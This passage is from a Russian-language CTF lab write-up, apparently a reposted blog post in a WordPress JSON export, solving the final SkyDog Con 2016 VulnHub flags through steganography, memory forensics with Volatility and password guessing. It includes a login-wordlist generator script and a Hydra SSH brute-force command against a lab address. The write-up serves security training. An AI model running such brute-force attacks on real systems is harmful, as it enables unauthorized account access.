  <\/i>. \u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043b\u043e\u0432\u043e: panam<\/i><\/p>\n
Flag#6 \u2014 \u00abWhere in the World is Frank?\u00bb<\/h3>\n
  \u00ab\u0413\u0434\u0435 \u0424\u0440\u044d\u043d\u043a?\u00bb \u2014 \u0445\u043c\u2026 \u0412\u0435\u0440\u043d\u0443\u0432\u0448\u0438\u0441\u044c \u043d\u0430 \u0441\u0430\u0439\u0442 \u0432\u0438\u0434\u0438\u043c \u0441\u0441\u044b\u043b\u043a\u0443 Possible Location<\/i>, \u043f\u0435\u0440\u0435\u0439\u0434\u044f \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439, \u043d\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430:  <\/p>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n
  <\/div>\n<\/div>\n
  \u041a\u0430\u0440\u0442\u0438\u043d\u043a\u0430 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043e\u0431\u044a\u0451\u043c\u043d\u0430\u044f, \u0447\u0442\u043e \u043d\u0430\u0432\u043e\u0434\u0438\u0442 \u043d\u0430 \u043c\u044b\u0441\u043b\u044c, \u043e \u0442\u043e\u043c \u0447\u0442\u043e \u0432 \u043d\u0435\u0439 \u0442\u0443\u0442 \u0435\u0441\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0435\u0449\u0451  <\/p>\n
sudo binwalk image.jpg<\/code><\/pre>\n
  <\/p>\n
  \u0412 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0435 \u0443 \u043d\u0430\u0441 \u0438\u043d\u0434\u0435\u043a\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b MyISAM \u043d\u0430 2\u041c\u0431. \u0412 \u0441\u0435\u0442\u0438 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/a> \u0444\u043e\u0440\u043c\u0430\u0442\u0430 \u044d\u0442\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430. \u0418\u0437\u0443\u0447\u0438\u0432 \u0435\u0433\u043e, \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u043c, \u0447\u0442\u043e \u0438\u043d\u0434\u0435\u043a\u0441\u044b MySQL \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u044c \u0438\u0441\u043a\u043e\u043c\u044b\u0439 \u043d\u0430\u043c\u0438 \u0444\u043b\u0430\u0433. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0432, \u0447\u0442\u043e \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0434\u0435\u043b\u043e \u0441\u043e \u0441\u0442\u0435\u0433\u0430\u043d\u043e\u0433\u0440\u0430\u0444\u0438\u0435\u0439, \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043d\u0430 \u0432\u044b\u0432\u043e\u0434 steghide<\/i>.
  \u041f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u0443 \u043d\u0430\u0441 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0437\u0430\u043f\u0440\u043e\u0441 \u043f\u0430\u0440\u043e\u043b\u044f.  <\/p>\n
steghide info image.jpg<\/code><\/pre>\n
  \u0425\u043c, \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0432\u0432\u0435\u0441\u0442\u0438 panam<\/i> \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0442\u0430\u043a\u043e\u0439 \u0432\u044b\u0432\u043e\u0434:  <\/p>\n
\u00abimage.jpg\u00bb:
   format: jpeg
   capacity: 230,1 KB
  Try to get information about embedded data? (y\/n) y
  Enter passphrase: 
   embedded file \u00abflag.txt\u00bb:
   size: 71,0 Byte
   encrypted: rijndael-128, cbc
   compressed: yes  <\/p><\/blockquote>\n
  \u0418\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u043c \u0444\u0430\u0439\u043b, \u0432 \u0444\u0430\u0439\u043b\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0444\u043b\u0430\u0433 flag{d1e5146b171928731385eb7ea38c37b8}<\/i> \u0438 \u043d\u043e\u0432\u0443\u044e \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443: clue=iheartbrenda<\/i><\/p>\n
Flag#7 \u2014 \u00abFrank Was Caught on Camera Cashing Checks and Yelling \u2014 I\u2019m The Fastest Man Alive!\u00bb<\/h3>\n
  \u0417\u0430\u0433\u0443\u0433\u043b\u0438\u0432 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0444\u043b\u0430\u0433\u0430, \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u043e\u0442\u0441\u044b\u043b\u043a\u0443 \u043a \u0441\u0435\u0440\u0438\u0430\u043b\u0443 FLASH<\/a>, \u0430 \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u0432 \u043d\u0430 \u0432\u0438\u043a\u0438<\/a> \u0443\u0437\u043d\u0430\u0451\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:  <\/p>\n
\u0421\u043f\u043e\u0439\u043b\u0435\u0440 \u043a \u0444\u0438\u043b\u044c\u043c\u0443<\/b><\/p>\n
\n
Frank calls him, attempting to apologize for duping Carl. Carl rejects his apology and tells him he will soon be caught, but laughs when he realizes Frank actually called him because he has no one else to talk to. Frank hangs up, and Carl continues to investigate, suddenly realizing (thanks to a waiter) that the name \u00abBarry Allen\u00bb is from the Flash comic books and that Frank is actually a teenager.<\/p>\n
  Frank, meanwhile, has expanded his con to include the identities of a doctor and lawyer. While playing Dr. Frank Conners, he falls in love with Brenda (Amy Adams). <\/p><\/blockquote>\n
  <\/div>\n<\/div>\n
  \u041d\u043e \u0447\u0442\u043e \u043c\u043e\u0433\u0443\u0442 \u0437\u043d\u0430\u0447\u0438\u0442\u044c \u044d\u0442\u0438 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438? \u0412\u0441\u043f\u043e\u043c\u043d\u0438\u0432 \u043f\u0440\u043e \u0437\u0430\u0431\u044b\u0442\u044b\u0439 \u0432 \u0441\u0430\u043c\u043e\u043c \u043d\u0430\u0447\u0430\u043b\u0435 ssh. \u0412\u0441\u0451 \u0441\u0440\u0430\u0437\u0443 \u043d\u0430\u0447\u0430\u043b\u043e \u0441\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f. \u0423 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c 2 \u0444\u0440\u0430\u0437\u044b iheartbrenda<\/i> \u0438 ILoveFrance<\/i>, \u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u043e\u0432\u044b\u0445 \u0438\u043c\u0451\u043d:  <\/p>\n
\u0413\u0435\u043d\u0435\u0440\u0438\u043c \u0441\u043b\u043e\u0432\u0430\u0440\u044c<\/b><\/p>\n
\u0414\u0430\u0451\u043c \u043d\u0430 \u0432\u0445\u043e\u0434 \u0441\u043a\u0440\u0438\u043f\u0442\u0443 \u043f\u0430\u0440\u044b \u0418\u043c\u044f \u0424\u0430\u043c\u0438\u043b\u0438\u044f<\/i>  <\/p>\n
Frank Conners
  Barry Allen
  Carl Hanratty<\/p><\/blockquote>\n
  <\/p>\n
#!\/bin\/bash import sys  def Usage(): \tprint('Usage: .\/NtoL.py [namelist]') \texit(0)  if len(sys.argv) <= 1: Usage() nameList = open(sys.argv[1]).read().splitlines() out = open(sys.argv[1], 'w') for item in nameList: \titem = item.split(' ') \tout.write( '%s%s\\n' %(item[0], item[1]) ) \tout.write( '%s.%s\\n' %(item[0], item[1]) ) \tout.write( '%s%s\\n' %(item[0][0], item[1]) ) \tout.write( '%s.%s\\n' %(item[0][0], item[1]) ) \tout.write( ('%s%s\\n' %(item[0], item[1])).lower() ) \tout.write( ('%s.%s\\n' %(item[0], item[1])).lower() ) \tout.write( ('%s%s\\n' %(item[0][0], item[1])).lower() ) \tout.write( ('%s.%s\\n' %(item[0][0], item[1])).lower() ) out.close()<\/code><\/pre>\n
  \u041d\u0430 \u0432\u044b\u0445\u043e\u0434\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0442\u0430\u043a\u043e\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u043b\u043e\u0433\u0438\u043d\u043e\u0432 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430:  <\/p>\n
CarlHanratty
  Carl.Hanratty
  CHanratty
  C.Hanratty
  carlhanratty
  carl.hanratty
  chanratty
  c.hanratty
  BarryAllen
  Barry.Allen
  BAllen
  B.Allen
  barryallen
  barry.allen
  ballen
  b.allen
  FrankConners
  Frank.Conners
  FConners
  F.Conners
  frankconners
  frank.conners
  fconners
  f.conners<\/p><\/blockquote>\n
  <\/div>\n<\/div>\n
  \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u0432\u0441\u0451 \u0432 Hydra \u0438 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043d\u0435 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0431\u044f \u0434\u043e\u043b\u0433\u043e \u0436\u0434\u0430\u0442\u044c:  <\/p>\n
hydra -L logins.txt -P flag7pwd ssh:\/\/192.168.1.174 -s 22222<\/code><\/pre>\n
  <\/p>\n
  \u0412\u0445\u043e\u0434\u0438\u043c, \u0438 \u0441\u0440\u0430\u0437\u0443 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0444\u043b\u0430\u0433:
  
  \u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438 \u0444\u043b\u0430\u0433\u0430 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c: theflash<\/i><\/p>\n
Flag#8 \u2014 \u00abFranks Lost His Mind or Maybe it\u2019s His Memory. He\u2019s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!\u00bb<\/h3>\n
  \u0412 \u0442\u043e\u0439 \u0436\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u0444\u043b\u0430\u0433, \u0435\u0441\u0442\u044c \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0444\u0430\u0439\u043b: security-system.data<\/i>
  \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u0435\u0433\u043e \u0441\u0435\u0431\u0435, \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430:  <\/p>\n
scp -P 22222 barryallen@192.168.1.174:~\/security-system.data .\/<\/code><\/pre>\n
  \u0418 \u0442\u0430\u043a \u043f\u0435\u0440\u0435\u0434 \u043d\u0430\u043c\u0438 \u0430\u0440\u0445\u0438\u0432, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u0435\u043c \u0435\u0433\u043e:  <\/p>\n
$ file security-system.data security-system.data: Zip archive data, at least v2.0 to extract $ 7z x -oSS security-system.data $ cd .\/SS $ ls security-system.data $ file security-system.data security-system.data: data<\/code><\/pre>\n
  \u0424\u043e\u0440\u043c\u0430\u0442 \u043d\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u043b\u0441\u044f, \u0437\u0430\u0442\u043e \u0440\u0430\u0437\u043c\u0435\u0440 1\u0413\u0431. Binwalk<\/i> \u043a\u0430\u043a\u043e\u0439-\u043b\u0438\u0431\u043e \u0432\u0440\u0430\u0437\u0443\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043d\u0435 \u0434\u0430\u043b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c volatility<\/i>:  <\/p>\n
volatility -f security-system.data imageinfo<\/code><\/pre>\n
  <\/p>\n
Volatility Foundation Volatility Framework 2.5
  INFO: volatility.debug: Determining profile based on KDBG search\u2026
   Suggested Profile(s): WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
   AS Layer1: IA32PagedMemoryPae (Kernel AS)
   AS Layer2: FileAddressSpace (\/CTF\/VulnHub\/SkyDog2016\/SS\/security-system.data)
   PAE type: PAE
   DTB: 0x33e000L
   KDBG: 0x80545b60L
   Number of Processors: 1
   Image Type (Service Pack): 3
   KPCR for CPU 0: 0xffdff000L
   KUSER_SHARED_DATA: 0xffdf0000L
   Image date and time: 2016-10-10 22:00:50 UTC+0000
   Image local date and time: 2016-10-10 18:00:50 -0400<\/p><\/blockquote>\n
  \u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u043f\u0435\u0440\u0435\u0434 \u043d\u0430\u043c\u0438 \u0434\u0430\u043c\u043f \u043f\u0430\u043c\u044f\u0442\u0438 \u041e\u0421 WinXP. \u041d\u0430\u0447\u043d\u0451\u043c \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0442\u044c \u0438\u0437 \u043d\u0435\u0433\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0438 \u043d\u0430\u0447\u043d\u0451\u043c \u0441 \u043c\u043e\u0434\u0443\u043b\u044f cmdline<\/i>, \u0442\u0430\u043a \u043a\u0430\u043a \u043e\u043d \u043f\u0435\u0440\u0432\u044b\u0439 \u0432 \u0441\u043f\u0438\u0441\u043a\u0435, \u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0435\u0440\u0441\u0435\u043d:  <\/p>\n
volatility -f security-system.data --profile=WinXPSP2x86 cmdline<\/code><\/pre>\n
  <\/p>\n
cmdline<\/b><\/p>\n
Volatility Foundation Volatility Framework 2.5
  ************************************************************************
  System pid: 4
  ************************************************************************
  smss.exe pid: 332
  Command line: \\SystemRoot\\System32\\smss.exe
  ************************************************************************
  csrss.exe pid: 560
  Command line: C:\\WINDOWS\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
  ************************************************************************
  winlogon.exe pid: 588
  Command line: winlogon.exe
  ************************************************************************
  services.exe pid: 664
  Command line: C:\\WINDOWS\\system32\\services.exe
  ************************************************************************
  lsass.exe pid: 676
  Command line: C:\\WINDOWS\\system32\\lsass.exe
  ************************************************************************
  vmacthlp.exe pid: 848
  Command line: \u00abC:\\Program Files\\VMware\\VMware Tools\\vmacthlp.exe\u00bb
  ************************************************************************
  svchost.exe pid: 860
  Command line: C:\\WINDOWS\\system32\\svchost -k DcomLaunch
  ************************************************************************
  svchost.exe pid: 944
  Command line: C:\\WINDOWS\\system32\\svchost -k rpcss
  ************************************************************************
  svchost.exe pid: 1040
  Command line: C:\\WINDOWS\\System32\\svchost.exe -k netsvcs
  ************************************************************************
  svchost.exe pid: 1092
  Command line: C:\\WINDOWS\\system32\\svchost.exe -k NetworkService
  ************************************************************************
  svchost.exe pid: 1144
  Command line: C:\\WINDOWS\\system32\\svchost.exe -k LocalService
  ************************************************************************
  explorer.exe pid: 1540
  Command line: C:\\WINDOWS\\Explorer.EXE
  ************************************************************************
  spoolsv.exe pid: 1636
  Command line: C:\\WINDOWS\\system32\\spoolsv.exe
  ************************************************************************
  VGAuthService.e pid: 1900
  Command line: \u00abC:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe\u00bb
  ************************************************************************
  vmtoolsd.exe pid: 2012
  Command line: \u00abC:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\u00bb
  ************************************************************************
  wmiprvse.exe pid: 488
  Command line: C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe
  ************************************************************************
  wscntfy.exe pid: 536
  Command line: C:\\WINDOWS\\system32\\wscntfy.exe
  ************************************************************************
  alg.exe pid: 624
  Command line: C:\\WINDOWS\\System32\\alg.exe
  ************************************************************************
  vmtoolsd.exe pid: 1352
  Command line: \u00abC:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\u00bb -n vmusr
  ************************************************************************
  ctfmon.exe pid: 1356
  Command line: \u00abC:\\WINDOWS\\system32\\ctfmon.exe\u00bb 
  ************************************************************************
  CCleaner.exe pid: 1388
  Command line: \u00abC:\\Program Files\\CCleaner\\CCleaner.exe\u00bb \/MONITOR
  ************************************************************************
  cmd.exe pid: 1336
  Command line: \u00abC:\\WINDOWS\\system32\\cmd.exe\u00bb 
  ************************************************************************
  wuauclt.exe pid: 1884
  Command line: \u00abC:\\WINDOWS\\system32\\wuauclt.exe\u00bb \/RunStoreAsComServer Local\\[410]SUSDS4ea33fbaffc4ad40bbd1dc3ac93ee5cb
  ************************************************************************
  wuauclt.exe pid: 1024
  Command line: \u00abC:\\WINDOWS\\system32\\wuauclt.exe\u00bb
  ************************************************************************
  notepad.exe pid: 268
  Command line: \u00abC:\\WINDOWS\\system32\\NOTEPAD.EXE\u00bb C:\\Documents and Settings\\test\\Desktop\\code.txt
  ************************************************************************
  cmd.exe pid: 1276<\/div>\n<\/div>\n
  \u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0441\u044f \u0444\u0430\u0439\u043b code.txt<\/i>. \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043c\u043e\u0434\u0443\u043b\u044c cmdscan<\/i>, \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0435\u0449\u0451 \u043e\u0434\u043d\u0443 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c:  <\/p>\n
volatility -f security-system.data --profile=WinXPSP2x86 cmdscan<\/code><\/pre>\n
  <\/p>\n
cmdscan<\/b><\/p>\n
Volatility Foundation Volatility Framework 2.5
  **************************************************
  CommandProcess: csrss.exe Pid: 560
  CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
  CommandCount: 2 LastAdded: 1 LastDisplayed: 1
  FirstCommand: 0 CommandCountMax: 50
  ProcessHandle: 0x2d4
  Cmd #0 @ 0x1024400: cd Desktop
  Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt  <\/div>\n<\/div>\n
  \u041f\u043e\u0441\u043b\u0435 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u0442\u043e\u0439 HEX \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0442\u0443\u0442<\/a>, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0444\u043b\u0430\u0433:
  flag{841dd3db29b0fbbd89c7b5be768cdc81}<\/i>, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0437\u0430\u0445\u0435\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0444\u0440\u0430\u0437\u0430: Two[space]little[space]mice<\/i><\/p>\n
  \u0412\u044b\u043f\u043e\u043b\u043d\u0438\u0432 \u043a\u043e\u043c\u0430\u043d\u0434\u0443:  <\/p>\n
volatility -f security-system.data --profile=WinXPSP2x86 notepad<\/code><\/pre>\n
  \u041c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u0430\u043c\u043f \u0442\u0435\u043a\u0441\u0442\u0430 \u0438\u0437 notepad, \u0438 \u0443\u0431\u0435\u0434\u0438\u0442\u044c\u0441\u044f \u0447\u0442\u043e \u044d\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u043d\u0443\u0436\u043d\u044b\u0439 \u043d\u0430\u043c \u0444\u043b\u0430\u0433:  <\/p>\n
notepad<\/b><\/p>\n
\n
Volatility Foundation Volatility Framework 2.5
  Process: 268
  Text:
  ?<\/p>\n
  Text:
  d<\/p>\n
  Text:<\/p>\n
  Text:
  ?<\/p>\n
  Text:
  66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d <\/p>\n<\/blockquote>\n
  <\/div>\n<\/div>\n
  CTF \u041f\u0440\u043e\u0439\u0434\u0435\u043d!!!
 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438  https:\/\/habrahabr.ru\/post\/317878\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

  \u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0440\u0430\u0437\u0431\u043e\u0440 \u043b\u0430\u0431 \u0441 VulnHub<\/a>. \u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0431\u0443\u0434\u0435\u043c \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0442\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0435 CTF<\/a> \u0441 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 SkyDog Con<\/a>  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-282795","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/282795","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=282795"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/282795\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=282795"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=282795"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=282795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}